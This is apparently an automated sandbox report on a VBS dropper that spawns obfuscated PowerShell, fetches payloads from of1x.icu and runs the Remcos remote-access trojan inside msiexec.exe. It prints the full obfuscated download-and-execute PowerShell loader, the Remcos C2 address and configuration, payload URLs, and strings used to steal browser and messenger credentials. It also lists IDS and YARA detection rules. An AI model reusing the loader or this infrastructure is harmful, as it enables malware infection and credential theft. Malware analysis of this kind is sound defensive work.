p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs", ProcessId: 5772, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: 91 90 9E C4 42 DA EF F2 5E D6 07 41 E5 DA 6C F1 EA DC F2 7D 8A A2 DD 55 6D F2 0C D7 43 E1 63 AB A5 39 B1 1B 1B 60 28 33 E1 3F 5A 5F B7 9C 58 73 77 71 F5 6D 7A 40 B1 D1 C4 85 A7 43 02 AF 6A 47 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 3660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-D98D6X\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-11T10:43:49.976531+010020365941Malware Command and Control Activity Detected192.168.2.549772154.216.18.622404TCP
              2024-12-11T10:43:52.429673+010020365941Malware Command and Control Activity Detected192.168.2.549778154.216.18.622404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-11T10:43:52.712659+010028033043Unknown Traffic192.168.2.549779178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-11T10:43:45.589743+010028032702Potentially Bad Traffic192.168.2.549761104.21.86.72443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.62:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-D98D6X", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2573780920.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000007FFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3660, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.5:49761 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.2423007734.00000000081C5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdb's)yqV source: powershell.exe, 00000004.00000002.2423007734.00000000081C5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2408368768.000000000741D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2028773495.00000214A7651000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030876632.00000214A7851000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2373145723.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2408368768.00000000073DA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb' source: powershell.exe, 00000004.00000002.2408368768.0000000007474000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_238D10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,7_2_238D6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49772 -> 154.216.18.62:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49778 -> 154.216.18.62:2404
              Source: Malware configuration extractorIPs: 154.216.18.62
              Source: global trafficTCP traffic: 192.168.2.5:49772 -> 154.216.18.62:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49779 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49761 -> 104.21.86.72:443
              Source: global trafficHTTP traffic detected: GET /XrVFrZoK/Skorter.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cqhHdWpt/PiOlNxFUCT165.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: global trafficHTTP traffic detected: GET /XrVFrZoK/Skorter.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cqhHdWpt/PiOlNxFUCT165.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000007.00000002.3329465729.00000000238A0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.3329761154.0000000023D10000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.3329761154.0000000023D10000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: of1x.icu
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: msiexec.exe, 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3317738045.0000000008021000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2573780920.0000000008026000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpHR
              Source: msiexec.exe, 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplu
              Source: powershell.exe, 00000002.00000002.2191640831.00000292999FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.2158565248.000002928B72B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://of1x.icu
              Source: powershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2158565248.0000029289991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2375867379.0000000004951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exeString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000007.00000002.3329465729.00000000238A0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000007.00000002.3329465729.00000000238A0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exeString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.2158565248.0000029289991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2375867379.0000000004951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
              Source: powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2158565248.000002928A57E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2191640831.00000292999FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2158565248.000002928B3DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2158565248.0000029289BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/
              Source: powershell.exe, 00000002.00000002.2158565248.0000029289BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/XrVFrZoK/Skorter.rarP
              Source: powershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/XrVFrZoK/Skorter.rarXR
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/cqhHdWpt/PiOlNxFUCT165.bin
              Source: msiexec.exeString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.5:49761 version: TLS 1.2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0041183A OpenClipboard,GetLastError,9_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2573780920.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000007FFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3660, type: MEMORYSTR

              System Summary

              barindex
              Source: amsi32_5692.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4088, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file: Call Predictions.ShellExecute( "p" + Betonblanderi,morular & Humoured & morular,"","",0)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa 